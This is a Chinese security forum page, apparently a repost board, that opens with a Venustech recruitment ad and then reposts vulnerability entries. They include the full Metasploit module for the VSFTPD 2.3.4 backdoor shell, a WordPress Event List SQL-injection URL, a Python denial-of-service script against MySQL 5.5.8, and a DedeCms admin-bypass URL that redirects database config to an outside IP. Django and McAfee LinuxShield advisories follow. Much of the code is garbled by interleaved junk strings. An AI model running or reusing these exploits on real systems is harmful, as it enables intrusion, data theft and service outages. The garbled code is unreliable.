最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。: J6 m# G0 x& P: @
    / ?2 G1 P5 X- B% A4 D0 w

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    ; P0 S& \/ Y: M) t9 p- ?  m安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.5 l7 ]+ b, y: Y% N
    精通C语言编程

    2.
    : o5 G# y/ P% Z* D  W熟练使用Linux操作系统,精通 Linux下C语言编程

    3.
      \; x; T. g- d7 i; h7 I精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.2 e4 K+ |* G/ y& }9 X! z' h: u6 z
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    ( A, p. X8 K4 X2 {熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.* Z  W6 @. Y% Z
    负责产品的系统测试、集成测试工作

    2.3 y! \, ~& ~4 b: B
    负责产品用例的编写,执行、修改

    3.' m+ d& L2 V8 K# m' t: y  A
    负责产品性能的测试

    4.2 b$ m& i. t3 M8 }; }
    负责对外项目的支持和测试工作

    岗位要求:

    1.
    3 S0 D7 g; a; ^掌握基本的tcp/ip知识

    2.
    4 b+ d; ~. y2 ~% |' U# T数通基础好

    3.) v" U+ W' {+ y$ T/ S
    对linux有一定的基础

    4.: z- b( y# M; q# w
    掌握数据库的搭建和使用

    5.
    5 ]" w% Y- g- k2 P  ~至少熟悉一种编程语言C/Perl/VBS/TCL

    6.7 O0 ~6 i7 j4 X: C; G; O
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    7 n* Z) N3 f& b9 w5 [4 ~熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8." E% p- F: F* m- v
    对网络安全设备在网络中的部署有一定的认识

    9.- A7 [8 h" O* J. t: v0 f$ O7 l4 l
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    9 C0 B4 y9 x6 f: w% @5 u
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    + d0 p( l; I7 Q  |0 K3 n
    对服务客户的技术支持

    3.
    + V' w- P7 t  b% w
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.5 f  b5 [0 L$ B$ f; @
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    , I7 a" i! F6 S$ R$ |" A9 g( X. N& n
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    8 Z5 R. w1 z! b+ e8 ^5 a- ^
    : x/ s% r4 M/ f
    7 X2 P$ S% R" K$ |; x, r4 k5 q/ Y& o3 D. d: {6 d& V, e$ ~: o
    require msf/core
    6 W6 s$ z# \% v& i+ I- H1 O& v& A! V
    class Metasploit3 < Msf::Exploit::Remote- l/ s" `7 U  U- I6 r
    Rank = ExcellentRanking
    * Y! D+ H1 M8 d; j# P$ @  t1 U- P9 x% z6 Z
    include Msf::Exploit::Remote::Tcp& Y7 q7 @5 w+ C7 |% a

    " p  B; U# t* K9 ?" gdef initialize(info = {})
    ! ^3 ~: N5 ?! n6 Tsuper(update_info(info# F3 C. I, T3 Q2 L; B+ Z
    Name => VSFTPD v2.3.4 Backdoor Command Execution
    / p1 |( ^# o. FDescript_ion => %q{
    % b0 i$ M; f7 W3 Y& RThis module exploits a malicious backdoor that was added to the VSFTPD download
    0 s3 F9 w9 S0 f( I3 C! a( Yarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    ; U9 W0 v% D& wJune 30th 2011 and July 1st 2011 according to the most recent information% O6 Q, P/ H) K2 K" V6 P2 ^5 R8 ~& M
    available. This backdoor was removed on July 3rd 2011.
    0 L- k. b6 J# W* ^% Y# `  k0 |}' @* R9 O$ g2 t+ G" n
    Author => [ hdm mc ]% {8 {" {, ?$ ~5 I( B* Z& w
    License => MSF_LICENSE9 l' i& ]- _) m
    Version => $Revision: 13099 $$ q3 C  x' l; `, p
    References =>
    ) L8 ]# W! q/ p+ T7 b[, [1 D; `! i: v; ?+ n) j/ F
    [ URL http://pastebin.com/AetT9sS5]
    3 y3 \5 K  u8 C) e2 W) ?2 c5 q0 ?[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    - B3 |$ Q+ F+ a# W]* b6 N) f' C4 e# ^, b  S% j! C
    Privileged => true- V; j4 F, Q& L
    Platform => [ unix ]
    " ~0 x% i+ {/ tArch => ARCH_CMD
    " v* B& m8 P: N  I* D0 WPayload =>4 l% w* E2 @/ E: ]! `% a
    {) L" }  N6 q- |/ ?7 G( g5 U% }5 Y
    Space => 2000
    ! Q" S2 p( q5 K: Q! n' iBadChars =>
    & V, l! W  r/ pDisableNops => true
    3 z- V  ^$ F- n# Y# R! h7 k2 LCompat =>4 I" K3 j" T5 i+ J0 t( X
    {
    * r( i) z/ o' O/ C0 R! q2 jPayloadType => cmd_interact
    8 l" W6 s( g0 O! s0 I0 kConnectionType => find! |0 c" e* l! E+ W# V
    }' N1 ]4 C* @% |  H6 W: D' y
    }: K3 Q8 c7 i4 r1 T
    Targets =>) k3 q. s+ b8 E& X# \' `; ^$ G
    [/ y" t, s8 @8 `; l
    [ Automatic { } ]5 e4 d7 h! R: d0 R8 f4 g( ]) ~8 _
    ]4 N+ v+ K. j) [8 z, S
    DisclosureDate => Jul 3 2011
    , X% S8 l8 S8 W3 rDefaultTarget => 0))
    # T) U$ m/ ^) K+ M7 q% u0 h- ^0 A
    register_options([ Opt::RPORT(21) ] self.class), `5 K3 [8 _: `  b$ j
    end
      o+ P/ M0 r7 [' N4 s% m) w1 b; Z, F/ x+ b% V9 B2 T2 F
    def exploit
    0 b" G9 q: U1 |8 d& U5 x# G. A0 I! L# o7 M5 F
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    ; w% i1 B5 N4 d- R7 T: tif nsock' V" M9 F, g6 g" y6 b
    print_status(The port used by the backdoor bind listener is already open)- t8 g& Q- x& k* X5 I) K- v+ _2 s
    handle_backdoor(nsock)4 l. H+ L* X) C- U2 r2 w
    return
    # W, [% n$ v- Q/ {) g1 xend
    # t+ G; S3 k) t% g
    $ Q+ t3 P- L+ l; n1 J# Connect to the FTP service port first9 ^/ F& i' _7 c3 S% `& ~
    connect
    ) o  x! ?" o5 w$ W1 B
    # I- @. i, C7 V% o9 qbanner = sock.get_once(-1 30).to_s: [8 e2 K6 y3 Z/ G, g6 s
    print_status(Banner: #{banner.strip})# I3 l3 s9 S& J0 n6 E! z
    ( J! ~6 I- R! ]9 y8 {* M$ ?( O
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    $ R' C2 U; n; @4 ?/ C): V, T4 z. B# L+ c& U6 Y
    resp = sock.get_once(-1 30).to_s. ^  z5 {9 O; {& k3 [$ ~
    print_status(USER: #{resp.strip})1 u; r* J8 m: X, L0 \/ P

    7 v6 q$ n- U; r' M0 W8 nif resp =~ /^530 /
    ) m4 E: i! V/ h. y# K4 I3 |print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    ) S/ `3 l5 u9 o- V! f) G* W7 v& Jdisconnect! L/ h* @8 c' E, Y; U
    return* X9 W: ~0 \) s; x# S+ `" B
    end$ v; k+ N& X- B& C. w7 J/ M% `

    . Z+ @& m8 W; L; u- Zif resp !~ /^331 /: P1 n. m" R" G5 L" {4 V# s
    print_error(This server did not respond as expected: #{resp.strip})
    , Z0 i4 F. q  s- Idisconnect
    ' f, p4 h0 i' Vreturn
    7 j' x- a, `2 e' n  A+ j3 I/ Eend
    ) `' C% B$ R$ A; f# f7 W  X/ i' \6 {* H
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}2 f( W- g; a8 i) M0 z, D" W* _
    )
    ' i4 {& U2 e" C+ T) L' w9 i4 Z. O* v+ m  Q) ^
    # Do not bother reading the response from password just try the backdoor0 h  B. \7 v9 O; v
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    3 P8 w, Q9 H2 O/ D: Q/ k# sif nsock$ _/ _! l( d  z- G2 z- A
    print_good(Backdoor service has been spawned handling...)( I- ^) h- `- }( f5 y) e
    handle_backdoor(nsock). }, n+ V: s7 Y1 y3 i: }' V
    return
    8 I0 ?+ P$ [1 J# G% Y/ m0 nend
    * A2 q( l8 ~2 e7 I# O3 w1 Z( ^4 t( }" m9 S
    disconnect0 s" w) C# J2 @2 G

      s" S% c: R; k( Kend
    + B( C9 [5 U1 B/ N8 f9 s0 D6 X: a5 b. |$ b$ T; o
    def handle_backdoor(s), V5 y0 q! G4 {) K

    8 b. b" `, k6 L/ R5 `s.put(id
    - y# T' L: N9 n8 o)
    2 c0 B" f. i, E* A0 |0 `# x
    2 n9 L3 P9 O; M' g$ [3 Pr = s.get_once(-1 5).to_s; T' l+ N" i' \3 m3 `- K1 F
    if r !~ /uid=/
    + m0 I/ K( Z1 Z2 B2 O, Mprint_error(The service on port 6200 does not appear to be a shell)4 L( d3 |2 u4 p  S4 X1 h( P
    disconnect(s)
    9 C& S1 z. a$ |2 c! L* freturn
    ; L, J9 G9 d9 h$ E' G$ E. ]end6 |1 O( ~/ S+ K* V( l2 s# d
    / _) T' `6 C1 ?0 G
    print_good(UID: #{r.strip})
    . {) y& e5 Z3 \' W. ~. I5 S+ y/ z: b1 T6 j! S
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)  ?7 B! I, T" v8 `
    handler(s)
    ' }& \2 {) I8 W& x- H: ^end
    8 C, G+ o# o. n. J: x7 d+ k) a( ^* M- p% }
    end复制代码3 L' G3 d6 I1 ]/ G) n' F; d- g

    % p8 m' A; k+ `) J- \3 ^. r8 L; f3 ~8 Z( r3 Z

    : ?6 D7 D$ A6 L, Z# `# j! s3 E
    . i8 ^: G, h" f
    + d; Q  y: L# L& a  P6 J. N+ |2 G
    + \) e' _6 w+ K9 @* @- Z. x
    . w4 O! b; M8 T. a/ {* k# E

    & R6 U/ R3 O  z* Q2 ?& ]6 _1 q; N' Q

    7 q0 J+ j' _) {7 l1 Y8 C' Z! d4 D7 a7 K
    ; x" W( s! ?# z) Q) r" ]( u

    ; y0 Y: p# p: I, n8 ^9 H6 |# `
    ) d  S7 Y; O* O  _% v) y. V; {' m* h$ Z% Z( V4 s
    $ ]4 o0 y& a* U# N* @6 ^
    " U8 E5 F# r4 Q0 G
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:
    , ?, v8 @1 G3 H) g- g# Z; B  0 G- |% }$ ^, C& ^8 A$ D5 }  Q; R# X, q
         : R$ @* B- w8 d# Z# N% W  V3 e
      $ n- k: B* u! ]6 b, ]
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress. ?& {$ n$ W: b: P+ C
    allows an authenticated user to execute arbitrary SQL commands via the id+ [! Z* H% M8 U/ `6 k5 D+ }
    parameter to wp-admin/admin.php. & D' e" R) `% U6 U( q; `; N: a: ~
      
    . X4 `8 S8 e2 O   
    - \- s% |) W$ B! K, q  9 i" Y2 u" r4 Q' ~% q9 I! [
    2. Proof of Concept:
    : q, H& D/ b+ c5 U7 h/ b( g0 ~  $ u1 m& O* e. }- \+ s
       3 M$ b" |9 e, _2 o/ h8 S: G7 ~
      
    4 S# G6 a7 m" thttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
      o! J6 u% p2 N=1 AND SLEEP(10)
    4 C. y3 Q7 Q0 q+ I  C0 H
    : y/ T- ]% j( J8 k8 \& P7 U  2 ]4 j5 L6 @5 y# K+ s5 u
       
    6 u+ v" B$ X" }  - T0 @% s2 ?3 j2 W' w- Y. u
    3. Solution:
    4 b2 ?( }2 d0 y3 y# b# Q; w/ S) a  
      R8 G( x1 a8 {$ F  z% S  ?& Y     ; D) T" A. `0 W1 ]8 a
      
    . ?: j/ f' s& B) ]8 q1 fThe plugin has been removed from WordPress. Deactivate the plug-in and wait
    # F0 d' N: @9 o- o% D6 rfor a hotfix.
    , ~7 ~: d% ~- Y2 e$ L  ! T2 w: E/ `/ ]5 [
       0 ^, m  \/ s# ~4 _; n# c4 c
      6 Q# v7 c2 Z8 S8 q  t! C5 [
    4. Reference:3 Y- R$ Y+ A7 F$ |
      8 k" o( q6 t& I3 x8 `1 j; ?7 e
       ' [0 R) R1 K& K7 A" m! s
      * p  H) D1 _7 J: Y
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje9 M: B9 i3 \4 [& \$ \5 o+ H
    ction-sqli/3 N* X% S  h0 z7 C! ]0 o
      . l+ _3 |; z8 C# H  U
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429" J, A" \2 q6 ?  [5 x0 @, K

    " Y9 F& _8 x5 `! y# A
    ) N$ S0 K% a2 l+ A, u( J
    + ]& P. C& H) t! @4 Z* ~, a
    7 E0 a" R+ L9 f5 q+ R6 z4 K1 c' Q) \* O

    , F: g. I; x4 m% ?* h0 B/ L
    . N/ x, p; y% k8 k9 a7 g5 c9 Q
    5 k& D6 C8 E1 F: ]/ A& d  q
    $ m/ ^1 z7 ?7 g  I  o  i: V1 X+ v: C0 l
    6 ^( }7 j3 V, b

      e, H: q# k% T$ ]1 S. Q/ K9 G: ?$ v) G3 F. g, z

    - y; x+ S8 w% C* `: w8 C
    0 x* x! _3 C' p1 |9 [& h, P2 v2 S5 u& H
    - a( d, V3 j4 O, h* Y

    5 k( ~% q$ }% s/ ~: {公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    * k# _8 |7 d1 @3 `4 m' a
    + |9 ?, [$ W- B( g7 z$ Iprint "
    $ N$ ]) `1 L. }6 ]& b0 v9 Q"
    " x6 j5 H' j) V6 G7 q* w3 xprint "----------------------------------------------------------------"% o4 Q4 P2 ~% C# R4 o0 P) n
    print "| MySQL 5.5.8 Null Ptr (windows)                                |". H. A- I' u9 q# F* e! b
    print "| Level Smash the Stack                                         |"
    ( x$ Z4 \6 X5 w4 ^0 pprint "----------------------------------------------------------------": H0 l( X! x4 u. t# h
    print "
    $ \/ L0 y0 i! D/ C# u"! V, e4 P! I: c0 j) D# Y  A; D+ p+ A0 ]

    % |) }# ?# Z2 P* U: Sbuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"+ I0 I' y( M! _7 P- O
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")" G  u- w; L( X# q
    7 U$ T+ Q' i& L! \
    buf2=("x11x00x00x00x03set autocommit30")
    8 d5 O7 @! d/ A. k' w! P
    / f# F7 E& Z; l$ e. f( u& `) Jdef usage():
    / V) |: q1 j. ^) w: j, ]print "usage : ./mysql.py <victim_ip>"
    1 O; H8 H; p4 k, f; sprint "example: ./mysql.py 192.168.1.22"
    3 L1 Z' `9 a! c4 I$ Q! K2 W2 \ 4 \( `! n) h+ a
    ( a5 Q9 }/ w+ a, G) b8 L3 \  E
    def main():* g7 y7 B$ I- c6 M5 u9 v2 W7 L( X
    if len(sys.argv) != 2:( t$ \+ j4 x8 f% d0 `+ P: k
    usage()) x# J' |% ^/ a& L1 J
    sys.exit()
    & \: a4 k; o$ q! x  d/ ^# q# }s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)5 Z$ v# y( V% @4 ~7 @

    4 V) [3 g" |8 a9 E) z" U" U0 YHOST = sys.argv[1]. C0 q/ I3 z7 ~" h
    PORT = int(3306)# H7 M6 \$ W( j7 M
    s.connect((HOST,PORT)). F" W' P% k9 q) b/ Z
    print "
  • Connect"$ \" c. \6 i9 r' m: r+ l# n( J
    s.send(buf), H# L# u& I( B3 m; Y
    print "
  • Payload 1 sent"8 v1 m7 d5 |8 |0 [
    s.send(buf2)( C# H/ @1 a0 o& H0 I
    print "
  • Payload 2 sent! o, d6 A  u+ r5 {9 ^( {
    ", "
  • Run again to ensure it is down..  F( S& o6 y, A
    "5 f* F* \: s" m$ \; h0 A+ t8 h
    s.close()# x- [. w4 `; r% O

    * P2 l8 y: {; L  x& F+ K3 `! U) fif __name__ == "__main__":0 @( J0 {  _, d# ^  S# }0 e3 V
    main()3 ?4 R% w0 C& i% ]
      @- A0 U7 Z8 B8 d3 a: c9 A

    # P" T, f$ q' i+ C. K3 ^: K- I. m0 n7 y$ `# u3 a

    5 v+ R% M* s& i$ l2 z; V7 M) f. q
    # \, v: N8 @) S  e- |! @
    6 e: {0 o2 m" `; K( r7 b& p5 U; |+ W6 o6 I( s& Y5 x
    5 u) i. _& M. M' `8 S

    ' k- j2 F1 D) v- O' a+ s' ~  N' P' C7 C0 ~+ f' H  E4 ^
    ' [% _5 f& C- w7 t7 \  q- y2 B
    9 c# S3 M; n6 X/ e
    : F3 |  s' W, W" v" ?
    4 R, o- s/ Q& B+ P# q+ u- h

    ! j4 M9 V. ~$ y5 D8 k) j7 W* B9 c- @2 x0 A% R0 S6 |' A7 H
    6 n: C3 u( G( ~/ f4 m* k4 V
    . C" i& C- Q$ \9 \+ r
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机

    - {; N3 V7 u- w6 j. khttp://www.sitedir.com.cn/video/4.swf
    8 b7 [* }: f5 V1 ]7 b( U8 Y8 @2 ~$ v* j' L( D: N+ l! m
    % t" O. Y; X, ?7 \( ]" v9 Z
    1 h4 w+ q4 H6 E; Q7 F; |
    & q# H0 W. ~) c& B; q

    - V2 M; U& G% }3 {3 T0 {* T9 z  ^" U# q. p7 A" z1 L, T& \, q# c
    : X  Q0 o  g# p
    5 w' y* F3 f( u* r0 C' q
    3 i! `3 E5 Z) i3 C# Z" p

    6 h9 u/ _( M6 K3 O+ H" M& R; |" b* V% d

    ; q% l- h6 }7 ^! m- ?* Y3 p! x( U- H
    + P+ R% n$ F- M! E6 e7 b' B

    1 c6 h9 V# \  \1 x& w9 t1 z# l3 [* T6 X4 F& s
    ( U6 G9 {( U* `. K6 f

    8 M$ s% s+ n' D( ]5 d0 A* \* G9 ?+ O公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    3 j6 p8 j# L" C
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    4 q- [, k; b7 E' p- u* C$ L6 [
    此漏洞的前提是必须得到后台路径才能实现

    3 W+ n$ _* v; v+ S
    官方临时解决办法:
    / `3 [8 n" U! L' X2 F
    找到include/common.inc.php文件,把:

    ; n; D& r/ F9 \# T1 Y0 o
        foreach($_REQUEST as $_k=>$_v)$ w( z9 x! T  r' E2 Q& u9 s
        {0 g  o8 o( Z6 G2 a1 p" x) |* l! |
            var_dump($_k);
    4 L- F/ k' S' I/ E: G        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )7 Y5 y, J0 x4 P6 S' [. ~5 o+ e
            {  b7 y4 v3 ~1 b  l: u
                exit('Request var not allow!');
    0 M, Q) [! ]  v1 j        }$ D, ~/ E# a6 w$ A5 w9 k8 `, B
        }

    . S( H( }! P, q/ Z2 H% U: ?
    换成:
      l& g( ~) {3 Y9 h! R2 T
        //检查和注册外部提交的变量5 _: R# `9 ]4 _) l0 a- \! T
        function CheckRequest(&amp;$val) {3 x8 A6 R: k( ~; S/ M# Z9 ?
            if (is_array($val)) {  {' ]: ^* c4 B: r* Q# o6 b
                foreach ($val as $_k=>$_v) {; J( k/ o" Y' L0 i0 i
                    CheckRequest($_k);& l: f2 b* C- q, r# z# }
                    CheckRequest($val[$_k]);$ k, o% O) @% e3 C  d2 M
                }
    9 e8 Q8 e4 l2 Q$ T  ~( y        } else
      Q! [8 [4 `- l! y        {
    4 r! [. I5 M: T. M% A2 D            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    5 e/ h" L$ ?- j' h4 I( v            {
    " v: b0 E9 B6 i                exit('Request var not allow!');
    3 f8 W$ @1 K' Y9 u            }+ N5 J  P8 B3 W2 D
            }
    5 U: d( o4 ?: e5 [    }, f; v5 A/ A( a6 J
        CheckRequest($_REQUEST);
    2 y6 h6 s6 Q2 X9 C  _# x9 Z% k
    + q: W7 w1 g1 A5 Y" H& o+ ~

    8 M; [8 }' f$ q1 X8 F6 S, o
    6 \$ ~4 [0 I2 O5 [* P7 C. m. l- Z& W. z) ?# f+ z% U; I; }
    5 ^# b* L. c" N' X$ |9 t' n# F  e

    + M/ G+ a) |) ], z5 Y6 Q
    7 g- c$ C' H: \, z% O, u% [& f  l
    ) Q3 M7 {( j; {  l
    7 Y7 I5 m. Z  C/ u3 j" u
    + x9 i0 }1 e  e+ M7 D8 N) M: g# e6 ~+ _7 y* A! u, q9 v

    9 ?7 E- P- K6 @/ _) I7 s
    : g8 @0 F2 A1 E7 i$ [  K
    3 O! }0 p7 L- y. O" T3 E5 K- {8 Q2 J1 C# i  X
    & F  V; T+ _5 k

      {0 }, C  O7 E$ ~% f6 X" H
    9 M4 p% S1 B0 R2 k- n8 F/ r* J6 u1 E1 ], B( h+ G
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    $ f, |0 h/ ]# T/ ?/ y& b% g5 g+ p4 J
    http://www.sitedir.com.cn/video/8.swf[/quote]6 s8 V' o! W; Z
    / ~+ m2 h' \* m- d3 b8 c6 _3 r" N
    % S5 L5 S9 v2 ?6 {
    ; V+ N8 t& S- E2 i+ a& K# @
    % H9 j% f5 ?6 E) f6 G3 b3 @  L

    ' J+ h' ?  t8 d2 F" U* o* y
    : u% b7 ^' @5 u' U* O
    $ p7 L: J7 @' C* K" O* U5 R+ w* o3 F/ M5 b5 _  Q

    9 O* r; h9 ]6 ]! N! N
    * Q0 Q' ^4 Q, M& x5 O/ t, J+ {9 q1 P" s8 W
    : a5 c% a# h9 e2 r

    . r( {1 V8 O! X6 ^! b1 }1 P, L4 U0 d" U; _5 |

    3 k/ X4 U: E; Z8 L2 h3 B3 E5 K3 A+ k

    8 u- u3 j6 @' x& L6 s2 b
    ' ]8 s9 f& {% D$ F; Z公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
      t6 ]$ D6 L& ], ?  b2 i1 I
    影响版本:- K8 R9 Y# m0 ]7 |( p1 @
    Django 1.2.5& X. n4 r& S4 h% p! a
    Django 1.3 beta 1
    9 A! E9 w2 X  R4 g3 iDjango 1.2.4& r* Q  g' f5 ~6 Z3 P
    Django 1.2.2
    " L( i3 I- x) j1 D. u# GDjango 1.2
    : i  B# H: n: `( O  W' C( H5 r
    漏洞描述:

    1 Y0 T6 c, {& O, a
    Django是一款开放源代码的Web应用框架,由Python写成。8 Y, A" v, z# x
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    6 ]# O) [$ d- e# g1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。* Z/ {0 K  y& A* g7 m6 P
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。. |" ]3 _  d* G
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    5 V6 b. S/ t' R0 h0 l9 J* H4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    2 r" O1 I! ^( D3 T9 b5 t$ k" [
    细节参考:
    4 J% E" ?4 Q4 S) J' ~# L* n# qhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/- x: ?$ }/ X6 w# ~" A( n# _3 n
    http://secunia.com/advisories/45939/
    ! Z( g& Y+ \8 S' k% O$ v
    0 u+ B, `9 C) U/ p# J5 R
    % E* v( }3 Z3 L$ `& v

    9 P- n$ s2 T5 D- n
    1 W: R6 x8 G; G* e- M
    # w3 D2 u; R* }6 I
    & Q+ ^- D  }2 a4 d6 K% U3 g" z0 o- _. i

    0 c, h9 L' G6 v4 v! t  G( i0 P' x6 |
    ; Z% X- {1 [2 p$ Q/ w! H- \: d
    5 J1 k1 A- T. j! [, Q

    ) o( G$ K7 T1 x) s+ x' ~- Y4 o' K$ k8 @5 \% q- J) g0 V
    ; c" y; P, D. ^
      W" q" s, ]9 U! e# M2 _0 B4 Y- v
    ( j8 A. Q2 c0 O: o1 X7 M4 S

    & l; @6 `: O' u) U5 a# J. d3 o; p& B, T. J: T  b& H

    , Y0 K" K( `/ ^7 f: W8 D  }8 ]公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    9 P% R( z5 `' Z; H2 e影响版本: McAfee LinuxShield <= 1.5.10 i' f  j# I3 s0 P
    远程攻击: Yes
    4 D' k# }, b- q) v8 K  Z0 V( d+ r, Y本地溢出: Yes. T5 v1 {6 `& h5 L/ [
    背景阅读:
    ( y" [( @0 }+ F* A$ I, [- a& l===========
    1 S0 H! F) \) V. S9 |' h( h/ {  u6 \( ?/ |/ T
    LinuxShield detects and removes viruses and other potentially unwanted
    3 o) U. @% e5 q  r- V; ^software on Linux-based systems. LinuxShield uses the powerful McAfee- e4 I+ g* S4 }3 J% p# W# @. ]* ~; j
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our: D; i' W) x5 e
    anti-virus products.
    / o+ w4 o7 [! s3 n
    & f8 h7 G" Q7 G* O' i( f& T( BAlthough a few years ago, the Linux operating system was considered a1 U  h% f3 `. }8 D9 ]
    secure environment, it is now seeing more occurrences of software
    2 ^) o! N" ^: p+ u9 Nspecifically written to attack or exploit security weaknesses in
    3 d) c4 k8 _+ `8 ]5 y& wLinux-based systems. Increasingly, Linux-based systems interact with. u. G9 E$ s: k$ v  B( I
    Windows-based computers. Although viruses written to attack Windows-
    8 X% d1 o8 e$ \$ X* dbased systems do not directly attack Linux systems, a Linux server
    / ?. l# V$ t# _# o1 X  L+ Rcan harbor these viruses, ready to infect any client that connects to+ ~" C% T/ I+ V* k  U4 Y* G
    it.
    ! c: `! G" T( S
    3 h. `* v  v' V; }When installed on your Linux systems, LinuxShield provides protection
    : X9 E$ c& e  C  A, e. ~against viruses, Trojan horses, and other types of potentially9 U* H) A6 f$ k7 [" Z
    unwanted software.  i' B+ E% M: z# _- Z; [

    . A+ h3 f- }6 v; p# fLinuxShield scans files as they are opened and closed$ V2 r& b9 l- Y9 S
    ?&amp;#65533;&amp;#65533; a technique( z9 N" `7 ]& i( u# N  K
    known as on-access scanning. LinuxShield also incorporates an
    ! M, ~5 k' O" s7 R. B$ C1 ion-demand scanner that enables you to scan any directory or file in+ z' ]5 e  n. ~( k8 q7 f
    your host at any time.8 h" J4 }# y" l% x; R

    ) k% h2 _+ k# a% jWhen kept up-to-date with the latest virus-definition (DAT) files,! W9 w  |# f- Y0 x
    LinuxShield is an important part of your network security. We# G+ L. `6 H5 P/ z
    recommend that you set up an anti-virus security policy for your
    / H( L" l0 u, Bnetwork, incorporating as many protective measures as possible.
    4 q# p9 W4 c: k' n  ?/ }6 Y
    ' `) S2 s# O+ S# K- O8 U6 ELinuxShield uses a web-browser interface, and a large number of0 ?2 r" Z6 U5 ^
    LinuxShield installations can be centrally controlled by ePolicy
